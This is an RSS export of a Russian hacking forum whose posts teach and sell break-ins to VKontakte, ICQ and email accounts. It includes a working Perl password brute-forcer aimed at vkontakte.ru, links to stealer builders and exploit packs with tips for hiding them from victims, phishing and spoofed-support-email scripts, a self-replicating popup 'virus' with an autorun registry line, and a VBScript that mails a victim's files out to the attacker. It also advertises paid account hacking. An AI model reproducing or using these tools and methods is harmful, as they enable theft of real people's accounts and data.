<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://xakerok.forumchik.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>XaKeRoK</title>
		<link>http://xakerok.forumchik.ru/</link>
		<description>XaKeRoK</description>
		<language>ru-ru</language>
		<lastBuildDate>Sat, 06 Mar 2010 14:11:15 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Взлом акк вконтакте</title>
			<link>http://xakerok.forumchik.ru/viewtopic.php?pid=8#p8</link>
			<description>&lt;p&gt;Так как частенько новички стали задовать вопросы о том как взломать учетку вконтакте, то решил написать статью-мануал по этому поводу, которая поможет получить ответы на многие вопросы. &lt;br /&gt;--------------------------------------------------------------- &lt;br /&gt;10 способов взлома анкеты vkontakte.ru &lt;br /&gt;--------------------------------------------------------------- &lt;br /&gt;Что нам потребуется: &lt;br /&gt;Умение настраивать пинч(если это у вас уже получилось, то остальные 2 требования можно не смотреть) &lt;br /&gt;Прямые руки &lt;br /&gt;Хоть капелька мозга &lt;br /&gt;1) Через мыло, если мы его знаем то уже все проще, ведь имеется как минимум 15 методов взлома почты...НО есть и еще один минус, если пароль &amp;quot;корявый&amp;quot;, он &lt;/p&gt;
						&lt;p&gt;разумеется надежный, но с его восстановлением проблемы, когда такой высылают на почту, то он принемает &amp;quot;левый&amp;quot; вид, и соответственно не работает. не в этом &lt;/p&gt;
						&lt;p&gt;суть, поэтому останавливаться не будем &lt;br /&gt;2) Фейк, достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд) скачать его можно по ссылке &lt;a href=&quot;http://slil.ru/25774471&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://slil.ru/25774471&lt;/a&gt; &lt;br /&gt;3) Троян. Эту категорию мы разделим на другие. &lt;br /&gt;а) Скинуть &amp;quot;чистый&amp;quot; файл, либо ссылку на загрузку его, но тут еще надо чтобы пользователь его запустил. &lt;a href=&quot;http://slil.ru/25774480&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://slil.ru/25774480&lt;/a&gt; - здесь лежит билдер пинча, а &lt;/p&gt;
						&lt;p&gt;здесь парсер &lt;a href=&quot;http://slil.ru/25774491&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://slil.ru/25774491&lt;/a&gt; , если вы захотите чтобы отчеты шли на гейт - вот подходящий от Генома - &lt;a href=&quot;http://slil.ru/25774495&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://slil.ru/25774495&lt;/a&gt; &lt;br /&gt;б) кейлогер - менее полезный, но если жертва его &amp;quot;словит&amp;quot; и вы покопаетесь(причем оочень долго) с отчетом, то пароль получите 100% &lt;br /&gt;в) Сплоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном ие6 и то, примерно, 6/10(имхо) &lt;br /&gt;Советую армитаж(айс пак тоже в теме). Прост в настройке, нужно только создать базу мускуль(делается в пару кликов), и отредактировать файлы(db.php &lt;/p&gt;
						&lt;p&gt;config.php), после того как зальете на хост, выставляем нужные права, на папку load - 777. config.php - 777 &lt;br /&gt;Скачать 3 связки можно по ссылке &lt;a href=&quot;http://slil.ru/25776403&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://slil.ru/25776403&lt;/a&gt; - здесь лежат мпак, айспак и армитаж &lt;br /&gt;ЗЫ когда будете настраивать пинч, устанавите права на гейт 775, на папку в которую будут идти отчеты - 777, и не забывайте что не надо называть папку с &lt;/p&gt;
						&lt;p&gt;отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или еще как, ну что бы внимания не привлекало...Папку в которой будет лежать сплоит, тоже &lt;/p&gt;
						&lt;p&gt;переиминуйте на что-нить типа myphotos и тд... тк люди будут эту ссылку себе в браузер пихать, не нужно что бы там было написанно EXPLOIT...лишнее палево ни &lt;/p&gt;
						&lt;p&gt;к чему... &lt;br /&gt;Идем дальше... &lt;br /&gt;Надеюсь, пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный был. &lt;br /&gt;Заходим по ссылке на файл install.php нашего сплоита, а потом идем в админку, устанавливаем настройки, выбераем файл который будет грузится жертве, теперь он &lt;/p&gt;
						&lt;p&gt;будет лежать в папке load под именем file. &lt;br /&gt;Кидаем ссылку жертве, и ждем с надеждой что ее пробьет и отчет с паролем нам придет. &lt;br /&gt;4)Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает(в случае пароля D5&amp;amp;%-AefV) &lt;br /&gt;Для этого брутфорсера нам потребуется активперл скачать мона тут &lt;a href=&quot;http://download.softportal.com/softw...ctiveperl.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://download.softportal.com/softw...ctiveperl.html&lt;/a&gt; либо по ссылке &lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.denwer.ru/packages/perl.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.denwer.ru/packages/perl.html&lt;/a&gt; &lt;br /&gt;Код брутфорсера: &lt;br /&gt;quote:&lt;/p&gt;
						&lt;p&gt;#!/usr/bin/perl &lt;/p&gt;
						&lt;p&gt;use IO::Socket; &lt;br /&gt;use MD5; &lt;br /&gt;use threads; &lt;br /&gt;use threads::shared; &lt;br /&gt;my @pass : shared; &lt;/p&gt;
						&lt;p&gt;open (pass, &amp;quot;&amp;lt;$dic&amp;quot;); &lt;/p&gt;
						&lt;p&gt;Next: &lt;br /&gt;@pass = pass(); &lt;/p&gt;
						&lt;p&gt;for(0..$threads) {$trl[$_] = threads-&amp;gt;create(\&amp;amp;Brut, $_);} &lt;br /&gt;for(@trl) { $_-&amp;gt;join; } &lt;/p&gt;
						&lt;p&gt;sub Brut &lt;br /&gt;{ &lt;/p&gt;
						&lt;p&gt;while (@pass){ &lt;/p&gt;
						&lt;p&gt;$pass = shift @pass; &lt;/p&gt;
						&lt;p&gt;$md5 = MD5-&amp;gt;hexhash($pass); &lt;br /&gt;$sock = IO::Socket::INET-&amp;gt;new(Proto=&amp;gt;&#039;tcp&#039;,PeerAddr=&amp;gt;&#039;vkontakte.ru&#039;,PeerPort=&amp;gt;80); &lt;br /&gt;print $sock &amp;quot;HEAD &lt;a href=&quot;http://vkontakte.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/&lt;/a&gt; HTTP/1.0\r\n&amp;quot;. &lt;br /&gt;&amp;quot;Host: vkontakte.ru\r\n&amp;quot;. &lt;br /&gt;&amp;quot;Accept: */*\r\n&amp;quot;. &lt;br /&gt;&amp;quot;Content-Type: application/x-www-form-urlencoded\r\n&amp;quot;. &lt;br /&gt;&amp;quot;User-Agent: Mozillo\r\n&amp;quot;. &lt;br /&gt;&amp;quot;Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n&amp;quot;. &lt;br /&gt;&amp;quot;Connection: close\r\n\r\n&amp;quot;; &lt;br /&gt;$answ = &amp;lt;$sock&amp;gt;; &lt;br /&gt;close $sock; &lt;br /&gt;print &amp;quot;$pass $answ&amp;quot;; &lt;br /&gt;if ($answ =~ /302/){ &lt;br /&gt;open (good, &#039;&amp;gt;&amp;gt;good.txt&#039;); &lt;br /&gt;print good &amp;quot;$id:$pass:$md5\n&amp;quot;; &lt;br /&gt;print &amp;quot;$id:$pass:$md5\n&amp;quot;; &lt;br /&gt;close good; &lt;br /&gt;exit;} &lt;br /&gt;} &lt;/p&gt;
						&lt;p&gt;} &lt;/p&gt;
						&lt;p&gt;goto Next; &lt;/p&gt;
						&lt;p&gt;sub pass &lt;br /&gt;{ &lt;br /&gt;my (@mas); &lt;br /&gt;while (&amp;lt;pass&amp;gt;){ &lt;br /&gt;push @mas, $_; &lt;br /&gt;last if (@mas == 400); &lt;br /&gt;} &lt;br /&gt;chomp @mas; &lt;br /&gt;return @mas; &lt;br /&gt;} &lt;/p&gt;
						&lt;p&gt;Не забудьте сменить разширение на brut.pl &lt;br /&gt;$dic = ‘passl.txt’; #паслист для брдутфорсера &lt;br /&gt;$id = 1; #айдишник цели(его можно взять из адресной строки когда вы зашли на страницу жертвы) &lt;br /&gt;$mail = ‘мыло’; #мыло, значек @ меняем на %40 &lt;br /&gt;$threads = Х; # где Х - количество потоков &lt;br /&gt;Если вам лень копаться со всем этим, то есть неплохой брут на С. Скачать его можно по ссылке &lt;a href=&quot;http://slil.ru/25774498,&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://slil.ru/25774498,&lt;/a&gt; сразу говорю, если не запускается - это &lt;/p&gt;
						&lt;p&gt;ваши проблемы, ибо все прекрасно работает! &lt;br /&gt;5)Имхо самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код iframe... &lt;br /&gt;Теперь, когда жертва перейдет на нашу ссылку, мы увеличиваем вероятность того, что юзера пробьет, либо через браузер, либо через тупость, тк теперь у нас на &lt;/p&gt;
						&lt;p&gt;ссылке комбинированная атака на мозг(фейк) и браузер(код iframe). &lt;br /&gt;6)Способ приводится много где, здесь нужно поискать сайты на которых сидит жертва(форумы, почта и пр) и попытаться похекать что-то из вышеперечисленного, &lt;/p&gt;
						&lt;p&gt;авось найдем старый заброшенный пароль, а он подойдет. &lt;br /&gt;7) как обычно СИ, пробуем отправить письмо от адресата durov@vkontakte.ru или support@vkontakte.ru с текстом типа, ваша страница на сайте vkontakte.ru будет &lt;/p&gt;
						&lt;p&gt;заблокированна через N дней, если вы не подтвердите какую-нить хрень, методом отправки нам пароля. &lt;br /&gt;Или, можно прислать письмо типа, вам пришло личное сообщение/открытка и пр, от такого-то пользователя, что бы ее прочитать перейдите по ссылке, а ссылка &lt;/p&gt;
						&lt;p&gt;будет вести на наш фейк. &lt;br /&gt;Что-бы отправить письмо с &amp;quot;левого&amp;quot; адреса, нужен какой-нить майлер, например, этот &lt;a href=&quot;http://softnic.ru/soft/programm_4223.html,&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://softnic.ru/soft/programm_4223.html,&lt;/a&gt; либо любой подходящий для вас &lt;/p&gt;
						&lt;p&gt;из гугла. &lt;br /&gt;Только не забудьте зарегить себе не привлекающее мыло, похожее на суппортское, и вписать его в поле копия.(что бы пароли пришли именно вам на почту) &lt;br /&gt;8) Снифер, тут лучше отправлять его на почту(если мы знаем мыло), тогда мы без лишних проблем сможем перехватить сессию, и с помощью системы восстановления &lt;/p&gt;
						&lt;p&gt;пароля на сайте вконтакте получить письмо с паролем. &lt;br /&gt;&lt;a href=&quot;http://forum.antichat.ru/showthread.php?p=457280&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://forum.antichat.ru/showthread.php?p=457280&lt;/a&gt; &lt;br /&gt;Есть сниферы и получше, но они платные, все же тема распространена и в гуле можно ввсести запрос на пхп снифер и найти много полезной инфы. &lt;br /&gt;9)ХSS, паблик дырок на этом сайте нету, так что кража кукисов маловероятна, хотя если ооочень долго подождать, то можно и дождаться паблик уязвимости - но &lt;/p&gt;
						&lt;p&gt;такой подход к делу бредовый, поэтому останавливаться на нем не будем. &lt;br /&gt;10) Самый простой способ, единственное что от вас требуется - уметь работать с платежными системами и иметь деньги. Просто закажите взлом если вам не помог &lt;/p&gt;
						&lt;p&gt;ни один из 9 пунктов, может найдется умелец который сломает неприступную жертву. Поискать такогого можно здесь - &lt;a href=&quot;http://forum.xakep.ru/forumid_308/tt.htm&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://forum.xakep.ru/forumid_308/tt.htm&lt;/a&gt; &lt;br /&gt;Перед тем как задать вопрос воспользуйтесь полезными ссылками: &lt;br /&gt;google.ru &lt;br /&gt;&lt;a href=&quot;http://www.poiskinfo.net/stat/st1.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.poiskinfo.net/stat/st1.php&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://segfault.kiev.ua/smart-questions-ru.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://segfault.kiev.ua/smart-questions-ru.html&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://penguin.kurgan.ru/doc/Perl/perlfaq1.htm&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://penguin.kurgan.ru/doc/Perl/perlfaq1.htm&lt;/a&gt; &lt;br /&gt;Ну и на последок - googleforidiots.com &lt;br /&gt;На этом все, надеюсь вам не особо скучно было при чтении всего этого. &lt;br /&gt;(с) [ NeitRoN]&lt;/p&gt;</description>
			<author>mybb@mybb.ru (NeitRoN)</author>
			<pubDate>Sat, 06 Mar 2010 14:11:15 +0300</pubDate>
			<guid>http://xakerok.forumchik.ru/viewtopic.php?pid=8#p8</guid>
		</item>
		<item>
			<title>Ваш первый вирус (для новичков)</title>
			<link>http://xakerok.forumchik.ru/viewtopic.php?pid=7#p7</link>
			<description>&lt;p&gt;Конечно вы можете клеить вирусняги на прогах по шаблону, но лучше всего учите языки программирования и пишите свои... Свой первый вирус(если его можно так назвать) я написал отчасти на html, отчасти на JS сразу после того как познакомился с кодом для всплывающих окон и даже не ожидал, что Каспер запалит его как Trojan.Windbomb. Вообще многие вирусы основаны на принципе цикличности и засирают оперативку. Вот код того &amp;quot;троянца&amp;quot;: &lt;br /&gt;&amp;lt;html&amp;gt; &lt;br /&gt;&amp;lt;head&amp;gt; &lt;br /&gt;&amp;lt;title&amp;gt; &lt;br /&gt;Ваш комп при смерти. Ждите... &lt;br /&gt;&amp;lt;/title&amp;gt; &lt;br /&gt;&amp;lt;sсriрt language=&amp;quot;JavaScript&amp;quot;&amp;gt; &lt;br /&gt;function virus() &lt;br /&gt;{ &lt;br /&gt;window.open(&#039;virus.html&#039;) &lt;br /&gt;} &lt;br /&gt;&amp;lt;/sсriрt&amp;gt; &lt;br /&gt;&amp;lt;/head&amp;gt; &lt;br /&gt;&amp;lt;body bgcolor=&amp;quot;black&amp;quot; text=&amp;quot;red&amp;quot; onload=&amp;quot;virus();&amp;quot; onunload=&amp;quot;virus()&amp;quot;&amp;gt; &lt;br /&gt;&amp;lt;center&amp;gt; &lt;br /&gt;&amp;lt;font size=&amp;quot;10&amp;quot;&amp;gt; &lt;br /&gt;КОМПУ КАПУТ!!! &lt;br /&gt;&amp;lt;/font&amp;gt; &lt;br /&gt;&amp;lt;/center&amp;gt; &lt;br /&gt;&amp;lt;/body&amp;gt; &lt;br /&gt;&amp;lt;/html&amp;gt; &lt;/p&gt;
						&lt;p&gt;Сохранить как virus.html. &lt;/p&gt;
						&lt;p&gt;Поняли в чём дело? Мы ставим pop-up на само себя и в итоге, если чел вырубит блокировку всплывающих окон, они у него начнут плодиться, пока комп не висанёт! Можно помодернизировать, например, закинуть в автозагрузку, впихнув в &amp;lt;head&amp;gt; VBS-код: &lt;br /&gt;&amp;lt;sсriрt language=&amp;quot;VBScript&amp;quot;&amp;gt; &lt;br /&gt;s.regwrite&amp;quot;HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Run\msdriver&amp;quot; &lt;br /&gt;&amp;lt;/sсriрt&amp;gt; &lt;/p&gt;
						&lt;p&gt;Предварительно закинув на жесткий диск. Главное - ваша фантазия! &lt;/p&gt;
						&lt;p&gt;А на BASIC&#039;е можно вообще сделать элементарный засиратель оперативки, менее опасный, чем выше описанный: &lt;/p&gt;
						&lt;p&gt;1 PRINT COMPUTER CAPUT!!! &lt;br /&gt;2 GOTO 1 &lt;/p&gt;
						&lt;p&gt;У чела миллион раз пишется &amp;quot;COMPUTER CAPUT&amp;quot; и приходится завершать работу программы. &lt;br /&gt;Ну конечно последний &amp;quot;вирус&amp;quot; не несёт никакой опасности, просто его принцип можно использовать для написания настоящих вирусов, способных повесить систему. &lt;/p&gt;
						&lt;p&gt;Удачи!!!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (NeitRoN)</author>
			<pubDate>Sat, 06 Mar 2010 13:52:44 +0300</pubDate>
			<guid>http://xakerok.forumchik.ru/viewtopic.php?pid=7#p7</guid>
		</item>
		<item>
			<title>Перехват сообщений ICQ НЕ в лок. сети (или кража истории). Как?</title>
			<link>http://xakerok.forumchik.ru/viewtopic.php?pid=4#p4</link>
			<description>&lt;p&gt;Да есть, вставляй туда скрипт написанный на vbs он отсылает тебе файл(ы) на почту! Прикрепить его как и другие файлы можно если сделать из rar ---&amp;gt; sfx. &lt;/p&gt;
						&lt;p&gt;Вот сам скрипт... &lt;br /&gt;quote:&lt;/p&gt;
						&lt;p&gt;On Error Resume Next &lt;br /&gt;Call SendPost(&amp;quot;smtp.mail.ru&amp;quot;, &amp;quot;кому@mail.ru&amp;quot;, &amp;quot;от_кого@mail.ru&amp;quot;, &amp;quot;Subj&amp;quot;, &amp;quot;Body&amp;quot;) &lt;br /&gt;Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) &lt;br /&gt;Set iMsg = CreateObject(&amp;quot;CDO.Message&amp;quot;) &lt;br /&gt;Set iConf = CreateObject(&amp;quot;CDO.Configuration&amp;quot;) &lt;br /&gt;Set Flds = iConf.Fields &lt;/p&gt;
						&lt;p&gt;Flds.Item(&amp;quot;http://schemas.microsoft.com/cdo/configuration/sendusing&amp;quot;) = 2 &lt;br /&gt;Flds.Item(&amp;quot;http://schemas.microsoft.com/cdo/configuration/smtpauthenticate&amp;quot;) = 1 &lt;br /&gt;Flds.Item(&amp;quot;http://schemas.microsoft.com/cdo/configuration/sendusername&amp;quot;) = &amp;quot;ваш логин&amp;quot; &#039;- логин на smtp сервер &lt;br /&gt;Flds.Item(&amp;quot;http://schemas.microsoft.com/cdo/configuration/sendpassword&amp;quot;) = &amp;quot;ваш пароль&amp;quot; &#039;пароль на smtp &lt;br /&gt;Flds.Item(&amp;quot;http://schemas.microsoft.com/cdo/configuration/smtpserver&amp;quot;) = &amp;quot;smtp.mail.ru&amp;quot; &#039;собстно сам сервер &lt;br /&gt;Flds.Item(&amp;quot;http://schemas.microsoft.com/cdo/configuration/smtpserverport&amp;quot;) = 25 &#039;порт на smtp сервере &lt;/p&gt;
						&lt;p&gt;Flds.Update &lt;br /&gt;iMsg.Configuration = iConf &lt;br /&gt;iMsg.To = strTo &lt;br /&gt;iMsg.From = strFrom &lt;br /&gt;iMsg.Subject = strSubject &lt;br /&gt;iMsg.TextBody = strBody &lt;br /&gt;iMsg.AddAttachment &amp;quot;C:\readme.txt&amp;quot; &lt;br /&gt;iMsg.Send &lt;br /&gt;End Function &lt;/p&gt;
						&lt;p&gt;Set iMsg = Nothing &lt;br /&gt;Set iConf = Nothing &lt;br /&gt;Set Flds = Nothing&lt;/p&gt;
						&lt;p&gt;iMsg.AddAttachment &amp;quot;C:\readme.txt&amp;quot; эта строчка отвечает за файл который посылать ( если сделаешь много таких строчек, то отсылаються несколько файлов!). &lt;/p&gt;
						&lt;p&gt;Если еще какие то вопросы по этой теме пиши! Помог? Поставь плюс...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (NeitRoN)</author>
			<pubDate>Sat, 06 Mar 2010 13:12:11 +0300</pubDate>
			<guid>http://xakerok.forumchik.ru/viewtopic.php?pid=4#p4</guid>
		</item>
		<item>
			<title>Поможем узнать пароль от ICQ, от электронной почты</title>
			<link>http://xakerok.forumchik.ru/viewtopic.php?pid=3#p3</link>
			<description>&lt;p&gt;Поможем узнать пароль от ICQ, от электронной почты: mail.ru, hotmail.com, &lt;br /&gt;gmail.com, yandex.ru, rambler.ru, yahoo.com, pochta.ru, ukr.net, i@ua и &lt;br /&gt;т.д., а также пароль к аккаунту: вконтакте, одноклассниках и других соц. &lt;br /&gt;сетях. &lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Работаем без предоплаты. Оплата только по завершении работы и доказательств &lt;br /&gt;успешно выполненного заказа: &lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;1. После взлома высылаем письмо со взломанного ящика на Ваш; &lt;/p&gt;
						&lt;p&gt;2. Даем личный инструктаж по безопасному использованию чужого аккаунта. &lt;/p&gt;
						&lt;p&gt;После оплаты: пароль и ответ на секретный вопрос. &lt;/p&gt;
						&lt;p&gt;Иных доказательств не предоставляем, по ящику не бродим, в чужую жизнь не &lt;br /&gt;влезаем, вся ответственность по использованию чужого аккаунта лежит на Вас. &lt;/p&gt;
						&lt;p&gt;Гарантируем полную Вашу анонимность. &lt;/p&gt;
						&lt;p&gt;Стоимость определяется индивидуально, в зависимости от конкретного заказа. &lt;/p&gt;
						&lt;p&gt;Вероятность взлома 95%, сроки 1 - 3 дня.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (NeitRoN)</author>
			<pubDate>Sat, 06 Mar 2010 12:59:40 +0300</pubDate>
			<guid>http://xakerok.forumchik.ru/viewtopic.php?pid=3#p3</guid>
		</item>
		<item>
			<title>VKONTAKTE.RU: ищем уязвимости, делимся опытом</title>
			<link>http://xakerok.forumchik.ru/viewtopic.php?pid=2#p2</link>
			<description>&lt;p&gt;Сайт vkontakte.ru на данный момент является чуть ли не самым известным сайтом для общения студентов и школьников. Я зарегистрировался на нем пару месяцев назад и нашел там почти всех своих бывших одноклассников и просто людей, с которыми я раньше общался, но потом по каким-то причинам потерял с ними связь. &lt;/p&gt;
						&lt;p&gt;Я знаю, что где-то пол года назад (на том же сайте, в какой-то группе о ней было написано) там была уязвимость, которая позволяла любому человеку, знающему ID пользователя, зайти в его аккаунт. Нужно было подправить в кукисах параметры remixid и remixemail на те, что были у пользователя и все, аккаунт твой. Но сейчас туда ввели еще и remixpass - хэш пароля. После этого, использовать уязвимость не представлялось возможным. Нет, был случай, когда я дал одному человеку троян, украл кукисы с винча и подставил значения, но это был взлом компьютера пользователя, а не сайта. &lt;/p&gt;
						&lt;p&gt;Зачем я все это пишу: я предлагаю вместе искать уязвимости на этом сайте и выкладывать свои результаты сюда. Не обязательно пытаться ломать весь сайт. Во-первых, это сложно и занимает много времени. Во-вторых, если кто его и сломает - вряд ли поделиться информацией о том, как он это сделал (хотя, х.з., бывают и добрые люди). Я сейчас говорю, допустим, об XSS, или, о чем-нибудь в этом роде. Пишите сюда, кто заинтересован. Можно сайт вместе поковырять. Я думаю, что эта тема будет интересна достаточно большому кругу людей&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (NeitRoN)</author>
			<pubDate>Sat, 06 Mar 2010 12:38:40 +0300</pubDate>
			<guid>http://xakerok.forumchik.ru/viewtopic.php?pid=2#p2</guid>
		</item>
	</channel>
</rss>
